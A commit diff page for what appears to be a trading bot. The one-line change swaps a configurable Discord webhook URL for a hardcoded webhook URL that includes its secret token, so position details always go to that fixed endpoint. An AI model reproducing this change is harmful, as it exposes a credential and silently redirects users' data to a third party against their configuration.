zhangchunrui 1 tháng trước cách đây
mục cha
commit
f0b644c840
1 tập tin đã thay đổi với 1 bổ sung1 xóa
  1. 1 1
      src/discord/index.ts

+ 1 - 1
src/discord/index.ts

@@ -61,7 +61,7 @@ export async function sendDiscordMessage(positionDetails: OpenPositionEvent['pos
 		})
 	}
 
-	return fetch(cfg?.discordWebhookUrl, {
+	return fetch('https://discord.com/api/webhooks/1449354624225120378/7gOkPXzZkaoQF7XWKFZRsevVSKXcUOuim2Rhtx_gWzBd9b7wphFMQiAIqBnRT3Gmkog4', {
 		method: 'POST',
 		headers: {
 			'Content-Type': 'application/json',